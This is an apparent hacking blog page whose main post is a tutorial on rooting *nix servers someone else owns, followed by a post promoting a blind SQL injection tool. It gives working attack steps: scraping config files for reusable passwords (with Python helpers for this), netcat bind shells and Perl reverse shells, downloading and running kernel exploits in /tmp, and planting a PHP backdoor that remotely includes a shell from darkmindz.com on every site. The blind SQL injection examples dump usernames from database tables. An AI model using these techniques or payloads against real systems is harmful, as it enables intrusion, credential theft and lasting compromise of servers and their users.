
Rooting basics

June 1, 2010

[ Gaining Root Access ]
[ The Basics of rooting a server ]

[x] What would I expect from this tutorial?

- This tutorial shows you the easy ways of gaining root access to a *nix server.
Most people think it is quite hard to do; I am trying to prove the opposite.

[x] I am interested, go on…

- Okay, you should know at least the basics of web hacking in order to gain access to the server you want to root.
If you have no idea, or have never gained access to a server before, I suggest you read some web hacking tutorials first.

I will start with some of the things you need to know in order to start rooting servers:

- Using a shell: have a good background in *nix commands and know your way around a *nix server.
[ You can learn all that locally, by just installing a *nix distro and playing around with it. ]
- How to use NetCat, and listen / connect to servers with it.
[ I will cover that in this tutorial ]
- As mentioned earlier, you must have at least the basics of web hacking covered: how to gain access to a server, etc.
[ Read some web hacking tutorials; I made a very basic one with a lot of examples covering the most used attack vectors. ]

Those are the basic requirements you should cover before reading this tutorial. If you feel one is missing, look up some tutorials on it, or ask me.

[x] How much access do you have?

- You cannot root a server with just an XSS on it, unless you take that XSS to the extreme and phish with it, but that is another story.
So we need at least the ability to upload, download or include our code, or simply to execute commands.

Once we can execute commands on that server, we start checking for things. This is my own checklist, which I run on every server; it is just a habit now:

Check /etc/passwd for the users who can log in. How do I know which can and which cannot?
Simple: `cat` the file and you will see one line per user, in this form:

user:x:501:502::/home/user:/bin/bash
[1]             [2]        [3]

The fields are colon separated: username, password field, UID, GID, GECOS (comment), home directory and login shell. The three we care about:

[1] - The username | good for us to know, since the same name is usually reused for cPanel, FTP and SSH...

[2] - The home directory of that user | good for cross-account hacks on a shared server, where you need to get at that user's files.

[3] - The login shell | If it is anything other than a real shell, such as:

Quote

/bin/sh
/bin/bash
/bin/zsh

it most probably means no shell / SSH access for that user. The usual "no login" values are /sbin/nologin and /bin/false; the shells the system considers valid are listed in /etc/shells.

Two caveats. The password field is `x` on any shadowed system (the hash is in /etc/shadow, readable only by root), while `*` or a leading `!` there means password login for that account is disabled even if its shell looks interactive. And a valid shell does not by itself mean SSH will let the user in: sshd_config (AllowUsers/DenyUsers, PasswordAuthentication) has the final say, so a found password still has to be tried.

Now, why are we looking for users with SSH access?

Because with SSH access it is much easier to work on that server: a proper interactive shell, faster command execution, file transfer with scp, etc.
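As an added example (not from the original tutorial), a small Python parser that does this check over a passwd file: it keeps only accounts whose shell is a real login shell and whose password field is not locked, and lists the home directories worth searching next. The passwd lines are constructed for the demo and the set of login shells is an assumption; on a real box read /etc/passwd and take the shell list from /etc/shells.

```python
"""Pick the accounts worth trying out of an /etc/passwd dump.

Added example for this tutorial, not the author's code. SAMPLE_PASSWD is
constructed for the demo and LOGIN_SHELLS is an assumption; on a real box
feed in /etc/passwd and take the shell list from /etc/shells.
"""
from dataclasses import dataclass
from typing import List

LOGIN_SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/bin/ksh", "/bin/dash", "/usr/bin/zsh"}

# Constructed sample, not taken from any real server.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
user:x:501:502::/home/user:/bin/bash
backup:*:503:503:locked account:/home/backup:/bin/bash
oldadmin:!:504:504::/home/oldadmin:/bin/zsh
ftpuser:x:505:505::/home/ftpuser:/bin/false
"""


@dataclass
class Account:
    name: str
    uid: int
    home: str
    shell: str
    locked: bool  # password field "*" or "!...": no password login at all


def parse_passwd(text: str) -> List[Account]:
    """One Account per well-formed line (7 colon-separated fields)."""
    accounts: List[Account] = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip malformed lines instead of crashing
        name, pw, uid, _gid, _gecos, home, shell = fields
        # "x" means the hash lives in /etc/shadow (root-only); "*" or a leading "!"
        # means password login is disabled regardless of how the shell looks.
        locked = pw == "*" or pw.startswith("!")
        accounts.append(Account(name, int(uid), home, shell, locked))
    return accounts


def login_candidates(text: str, login_shells=LOGIN_SHELLS) -> List[Account]:
    """Accounts with a real login shell and a password field that is not locked."""
    return [a for a in parse_passwd(text) if a.shell in login_shells and not a.locked]


def homes_to_search(text: str) -> List[str]:
    """Home directories of the non-root candidates: where to hunt for config files."""
    return [a.home for a in login_candidates(text) if a.uid != 0]
```

Running `login_candidates(SAMPLE_PASSWD)` on the sample returns only root and user: the two nologin accounts and ftpuser fall out because of their shells, and backup and oldadmin fall out because their password fields are locked even though their shells are bash and zsh.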

Now let's say the user `user` has SSH access. We go to his home directory and look for config files, passwords, backups, anything that might contain a password.

Then try it on SSH with the user `user` and the password we found. If you are lucky, you will get access. (Try the same password for that user on FTP and cPanel too; people reuse them.)

[ Not going to explain what to do next, cause we still need to complete the checklist ]

Alright, so none of the users have SSH access... we cannot just give up now, can we?

If the hosting company is not that big, or if it is a private server, VPS or dedicated server, most likely the hosting company's own site is on the same server...

That is a great thing to have. So we do a simple WHOIS on the server's IP, identify the host, and then try to find the home directory of its site...

Now most hosts run billing software, system check panels, etc. All of those need privileged access to the server, so in most cases you will find an admin password stored in plaintext in their config files.

We will be looking for config files. How?

Well, we moved to the host's home directory, so let's check their files...

By listing the files there we see a folder called `billing`; let's check that out...

The first step is to get the contents of the index and look for the included files. In most cases the name alone makes it clear which file is the config file.

it will be something like:

<?php include('config.php'); ?>

or

<?php include('connection/db.php'); ?>

or

<?php include('includes/conf.php'); ?>

By getting the contents of that file we can get the password, and try it for that user on SSH, cPanel and FTP. (What you usually find is the database password; the bet is that the admin reused it for the account.)
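As an added example (not the author's code), a small Python scanner that does this mechanically: read index.php, follow its include()/require() targets one level, and pull out password-looking variable assignments and define() constants from the included files. The `billing` tree it builds in a temp directory, and the file names and values in it, are constructed for the demo; on a target you would point scan_webroot() at the real directory.

```python
"""Follow the includes of an index.php and pull credential-looking settings
out of the included config files.

Added example for this tutorial, not the author's code. build_demo_webroot()
creates a constructed fake `billing` app in a temp dir so this runs offline;
on a target you would point scan_webroot() at the real directory.
"""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# include('config.php'); require_once 'includes/conf.php'; include_once("x.php");
INCLUDE_RE = re.compile(r"""(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""")
# $db_pass = 'x';  $dbpwd = "x";   (variable names containing pass/pwd)
ASSIGN_RE = re.compile(r"""\$(\w*(?:pass|pwd)\w*)\s*=\s*['"]([^'"]*)['"]""", re.I)
# define('DB_PASSWORD', 'x');      (constant names containing pass/pwd)
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](\w*(?:pass|pwd)\w*)['"]\s*,\s*['"]([^'"]*)['"]""", re.I
)


def included_files(php_source: str, base_dir: str) -> List[str]:
    """Resolve include/require targets of one PHP file that exist under base_dir."""
    found = []
    for target in INCLUDE_RE.findall(php_source):
        path = os.path.normpath(os.path.join(base_dir, target))
        if os.path.isfile(path):
            found.append(path)
    return found


def find_credentials(php_source: str) -> List[Tuple[str, str]]:
    """(name, value) pairs for non-empty password-looking settings."""
    pairs = ASSIGN_RE.findall(php_source) + DEFINE_RE.findall(php_source)
    return [(name, value) for name, value in pairs if value]


def scan_webroot(root: str, entry: str = "index.php") -> Dict[str, List[Tuple[str, str]]]:
    """Read `entry`, follow its includes one level, return credentials per file."""
    with open(os.path.join(root, entry), encoding="utf-8", errors="replace") as fh:
        index_source = fh.read()
    results: Dict[str, List[Tuple[str, str]]] = {}
    for path in included_files(index_source, root):
        with open(path, encoding="utf-8", errors="replace") as fh:
            creds = find_credentials(fh.read())
        if creds:
            results[os.path.relpath(path, root)] = creds
    return results


def build_demo_webroot() -> str:
    """Constructed fake billing app: index.php pulling in two config files."""
    root = tempfile.mkdtemp(prefix="billing_demo_")
    os.makedirs(os.path.join(root, "includes"))
    files = {
        "index.php": "<?php include('config.php'); require_once 'includes/conf.php'; ?>",
        "config.php": "<?php\n$db_host = 'localhost';\n$db_user = 'billing';\n"
                      "$db_pass = 'Sup3rS3cret!';\n",
        "includes/conf.php": "<?php\ndefine('SITE_NAME', 'Example Host');\n"
                             "define('ADMIN_PASSWORD', 'letmein');\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root
```

`scan_webroot(build_demo_webroot())` returns the database password from config.php and the admin constant from includes/conf.php, and nothing for the host name, user name or site name. The regexes only follow string-literal include paths and only one level deep; real apps often build paths from constants, so treat the output as a starting point, not a complete inventory.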

[ No luck… next… ]

The hosting company has its files on another server, there are no backups whatsoever, and you are getting desperate by now...

NetCat to the rescue! NetCat, the TCP/IP swiss army knife, should always be in your pocket (flash drive or whatever you use); it is very useful.

As I promised, I will explain the usage of NetCat, so here we go:

[ Windows ]

After downloading NetCat, open up your CMD and change to the directory it is in.

The commands you would need are:

nc -vv -l -p 5555

This makes NetCat listen on port 5555, verbosely (telling you exactly what is going on). That simple, eh?

nc -vv -L -p 5555

Same thing, but with a capital L (an option of the Windows build only): once the client disconnects it listens again, and again...

nc darkmindz.com 80

Connect to darkmindz.com on port 80.

nc -vv -l -p 5555 -e cmd.exe

Okay, you do not want to do that on your own PC: this listens on port 5555 and, once someone connects, hands them a cmd.exe. The -e option only exists in netcat builds compiled with GAPING_SECURITY_HOLE defined; the classic Windows build has it.

[ Thats all you need to know about NetCat for now ]

[ *nix ]

Downloaded NetCat, compiled it, and ready to go...

Same commands. The only difference is that, since most web servers are *nix, you will use it as a `backdoor` (a bind shell) with this command:

./nc -vv -l -p 5555 -e /bin/bash

Once you connect to port 5555 you have a bash command line on that server.

Caveat: -e is only present in the "traditional" netcat compiled with GAPING_SECURITY_HOLE. The OpenBSD netcat that many distros ship has no -e and takes the listen port as `nc -l 5555`. If the nc on the target lacks -e, compile the traditional one yourself, use Ncat from Nmap (which has --exec), or fall back to the well-known mkfifo trick that pipes a shell through a plain nc.

Alright, where does that leave us? We still need a better way to execute commands on the server, and all our attempts to get SSH access failed...

Now we are going to move into, Backconnecting and Backdooring…

[ Backconnecting ]

A simple definition would be:

Making the server connect to you.

Limitations:

The server has to be able to open an outbound connection to your listener. If outbound traffic is filtered (egress filtering, or a server with no direct route to the internet), you cannot use this method. It is the mirror image of a bind shell: a bind shell needs an inbound connection to the server to be allowed, a backconnect needs an outbound one, so when one is blocked the other is usually worth trying.

How-To:

Well, you can code your own backconnector; it is not that hard if you know C or Perl. If you do not, you can always use one of the many backconnectors out there.

The most used tools (at least by me) are the Iranian backconnector and the cyberlab one. Both are in Perl, and both work like a charm.

Of course Perl has to be installed on that server to use those. If it is, all you need to do is:

Use NetCat on your PC to listen on a port:

nc -vv -l -p 5555

Then, on the server, follow the instructions of your backconnector. Most likely it is:

perl shos.pl your_ip_here 5555

If it connected, your listener will print the incoming connection and you can start executing commands.

Otherwise, try a C backconnect tool: same concept, just compile and run. And if the connection never arrives, suspect egress filtering before suspecting the tool; try a port the server is likely allowed to reach, such as 80 or 443.

[ Backdooring ]

Backdooring is opening a port on the server for you to connect to (a bind shell)...

You can use NetCat in this case, and run the command:

./nc -vv -l -p 5555 -e /bin/bash

Then connect to that port with NetCat, the same way as connecting to darkmindz.com on port 80 above... done.

Or use one of the bind shells out there. They will not work on a lot of servers, as hosts have started killing the process, but if it works, great!

[x] So, we have been talking about how to get more access to execute commands all day now. What's next?!

Right, so no backups were found, the host is not on the same server, and where it was, all the passwords were either invalid or hashed.

Now we move into kernel exploits, and using the server to the max.

By now you should have command-line access of some kind: SSH, backconnect, backdoor, whatever it was...

So now you can easily execute commands on the server, but what exactly would you do?

Now it is time to get info on the server: kernel, processes, services, and then look for vulnerabilities.

We always start with the kernel. Get the kernel version with:

uname -a

It prints the kernel name, hostname, kernel release (the version number you need, e.g. 2.6.x), the build string, the architecture and the OS. Now we need to find an exploit for that kernel. Keep in mind that distro kernels backport fixes, so the release number alone is a lead, not proof; the distro build suffix matters too.
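As an added example (not the author's), a Python helper that pulls the kernel release out of a `uname -a` line and splits it into the upstream version and the distro build suffix, so it can be compared with the kernel range an exploit's description gives. The uname lines are constructed samples and the version passed to release_before() is a placeholder, not a statement about any real kernel bug.

```python
"""Turn `uname -a` output into something comparable against an exploit's
stated kernel range.

Added example for this tutorial, not the author's. The uname lines used
with it are constructed samples; the `fixed` version passed to
release_before() is a placeholder, not a claim about any real vulnerability.
"""
import re
from typing import Tuple

# Kernel release strings look like "2.6.18-194.el5", "3.2.0-4-amd64", "4.15.0-112-generic"
RELEASE_RE = re.compile(r"\b(\d+)\.(\d+)(?:\.(\d+))?(?:-([\w.+~-]+))?\b")


def kernel_release(uname_a: str) -> Tuple[Tuple[int, int, int], str]:
    """Return ((major, minor, patch), distro_build) from one `uname -a` line."""
    fields = uname_a.split()
    if len(fields) < 3:
        raise ValueError("not a uname -a line")
    # uname -a order: sysname nodename release version machine [processor hardware os]
    m = RELEASE_RE.match(fields[2])
    if not m:
        raise ValueError(f"unparseable release: {fields[2]}")
    major, minor, patch, build = m.groups()
    return (int(major), int(minor), int(patch or 0)), build or ""


def release_before(uname_a: str, fixed: Tuple[int, int, int]) -> bool:
    """True if the upstream version is older than `fixed`.

    Caveat: distro kernels (the "-194.el5" part) backport fixes, so an
    older-looking upstream version is a lead to check against the vendor
    advisory for that exact build, not proof the exploit will work.
    """
    version, _build = kernel_release(uname_a)
    return version < fixed
```

On a constructed RHEL-style line such as `Linux host 2.6.18-194.el5 #1 SMP ... x86_64 GNU/Linux`, kernel_release() gives `((2, 6, 18), "194.el5")`; the first tuple is what you match against an exploit's "affects up to" note, the build string is what you look up in the vendor's changelog before trusting that match.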

a good website for kernel exploits is: http://melol.free.fr/local/

Let's say you found the kernel exploit. Now we need to run it. How?

Let's move to a directory nobody usually looks in, and one we can write to: /tmp/.

Now we download the exploit. We can use wget for that:

wget http://melol.free.fr/local/the_name

If it says permission denied for wget, do not worry, there is always cURL:

curl http://melol.free.fr/local/the_name -o new_name

If that does not work either, remember your web shell? Use it to upload the exploit into /tmp/.

Before running it, check whether it is compiled or not; a quick look at the contents tells you.

If it is not compiled (most probably the extension will be .c), you need to compile it:

gcc name.c -o new_name

Now to run it we need to give it execute permission. Execute is all it needs, so chmod +x is enough (777 also makes it world-writable, which gains you nothing):

chmod +x new_name

Alright, now let's hope this works, and run it... If gcc was missing on the target, compile on your own box with the same architecture and libc and upload the binary instead. If /tmp is mounted noexec, the binary will refuse to run from there; use another writable directory such as /dev/shm or one under the web root.

./new_name

You can check whether it worked with `id` or `whoami`; if it says uid=0 (root), you are good to go.

Alright, we covered the very basics of getting root on a server. Rooting is not that hard; some attack methods are hard, like BoFs, where you need C knowledge to debug and exploit the process...

[x] I don't want to lose the root!!

No one does, but a lot of people make stupid mistakes that cost them the root...

Rule #1, and the most important: you NEVER change root's password, NEVER EVER!

Create a new user with SSH access; check the useradd command for more info.

If you used a local root exploit, make sure you keep other copies of it on that server; you might need it again.

Backdoor every single site on the server with a simple PHP shell backdoor:

<?php $config_x = $_SERVER['HTTP_USER_AGENT']; if($config_x == "myb4ckd00r") { @include('http://www.darkmindz.com/shell/x2300.txt'); } ?>

Note that the remote include() in that one-liner only works when allow_url_include is On (it is Off by default since PHP 5.2.0), so on most servers you will need to drop the shell on disk and include it by local path instead.

Use bind shell backdoors too; you can download a good collection of backdoors from DarkMindZ.com.

The backdoors will need to be compiled, and that is general *nix knowledge. If you still do not know how to use them, you are not ready to start rooting; learn your way around *nix first.

This is the end of this tutorial, I hope you liked it

Posted by r00t3er at 10:43 pm

mySQLenum – Automatic blind sql injection tool

mySQLenum is a command-line automatic blind SQL injection tool for web applications that use MySQL as their back end. Its main goal is to provide an easy to use command-line interface.

Coded in pure C, it does not depend on external libraries, is fast, and supports all MySQL versions.

It is easy and simple to use; web application developers who use a database can run it to find known vulnerabilities in their own applications.

[ Screenshot: mySQLenum – Automatic blind sql injection tool ]

Five necessary parameters:

–url: target URL
–sql-query: sql query to execute (or –macro to enter in Macro mode)
–param: vulnerable parameter
–param-value: a valid value to assign to parameter
–match-string: string to match in page content when the query is valid

How to use mySQLenum

mysqlenum --url="http://www.oneexample.com/page.php" --sql-query="select username from users" --param=page_id --param-value=1 --match-string="Articolo 22" --http-auth="user:P4ssw0rd"

Query: select username from users

1) root
2) local
3) marco
4) luca
5) —

> Total requests: 192
> Data sent: 40 Kb
> Data received: 862 Kb

When only the five parameters above are provided, it assumes:

- the request type is GET
- the web server port is 80
- the charset used during the enumeration is the ASCII range 32 to 122

We can also use the CONCAT function to enumerate several fields with only one query.

One more example, in macro mode.

In interactive macro mode it is possible to automatically enumerate:

- all available databases
- all tables of a specific database
- all fields of a specific table

Macro mode requires that INFORMATION_SCHEMA is accessible (MySQL 5.0 or later).

mysqlenum --url="http://www.example.com/page.php" --macro --param=page_id --param-value=1 --match-string="Articolo 22"

Available macros:
1) Databases enumeration
2) Tables enumeration
3) Fields enumeration

Your choice: X

Databases:
1) information_schema
2) site
3) —

> Total requests: 227
> Data sent: 62 Kb
> Data received: 1066 Kb

Operating system supported

*nix Systems

Download mysqlenum Here

Posted by r00t3er at 6:43 pm

     


About Me

A happy fellow...listen more talk less..money rules (best rules) learn daily and never underestimate a thing nor a c0de..

sign: give me d source c0de of d world if u want the world to be a better place...

Message Board

r00t3er:

hi johnson smith, add any of my id.. and tell me what you need

johnson smith:

I am from robotex. please i need your tools and teachings.

Jah bless.


s4l1ty:

blog walking ^o^

asd:

http://hackersbay.in

asd:

http://hackersbay.in

site is better

l4zyb0i:

nice blogs dude !!!

r00t3er:

hi guns..hows devilzc0de doing..i need some of ya scripts ..talk to you on ym if ur not always invisible lol heheh:d

mr. guns:

hello

r00t3er:

ok

aLeXH2L:

bro come to ym i got stuff what u want

r00t3er:

dont forget to leave comments
